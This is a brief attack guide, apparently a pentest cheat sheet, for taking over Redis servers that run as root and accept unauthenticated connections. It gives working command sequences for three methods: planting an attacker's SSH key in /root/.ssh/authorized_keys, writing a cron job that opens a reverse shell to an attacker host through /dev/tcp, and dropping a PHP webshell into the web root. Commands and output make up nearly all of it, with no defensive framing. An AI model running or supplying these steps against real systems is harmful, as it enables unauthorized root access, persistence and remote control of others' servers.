(1) Write the ssh-keygen public key and log
in with the private key . This method can be used under the following conditions
The Redis service uses the ROOT account to start the
server. The SSH service is opened and the key login is allowed. You can write a public key remotely and log in to the remote server directly.
1: Establish the ssh key locally
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:P24CPwgr75TtlEAgIY95v7mcAWpd7S6N1KGhi7hHO6s root@kali
The key’s randomart image is:
±–[RSA 3072]----+
|+… |
|.= . |
|o o . |
| . o … |
| . +.+.S |
| .oooOoo . |
|oo.oOo*= o |
|o.=+.Oo.+… |
|E+.** o. +. |
±—[SHA256]-----+
2: Then write the content of the public key
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>test.txt
3:Remote the content to the redis server
cat test.txt |redis-cli -h IP -x set test
4: Log in to the remote server and view the public key
redis-cli -h IP
keys *
get test
5: View the current path and name
config get dir
config get dbfilename
5: Modify the path
config set dir "/root/.ssh/"
6: Modify the saved name
config set dbfilename "authorized_keys"
7: save
save
8: Connect
ssh -i id_rsa IP -l root
9: Delete key
(2) Use scheduled tasks to execute commands to reverse shell
1: Attacker's listening port
nc -lvnp PORT
2: redis execute command
redis-cil -h IP
set x “\n* * * * * bash -i >& /dev/tcp/VPS/PORT 0>&1\n”
3: Modify the path
config set dir /var/spool/cron/
4: Modify the saved name
config set dbfilename root
5: save
save
(3) Write webshell to the web physical path
config set dir /var/www/html/
config set dbfilename shell.php
set x “<?php phpinfo();?>”
save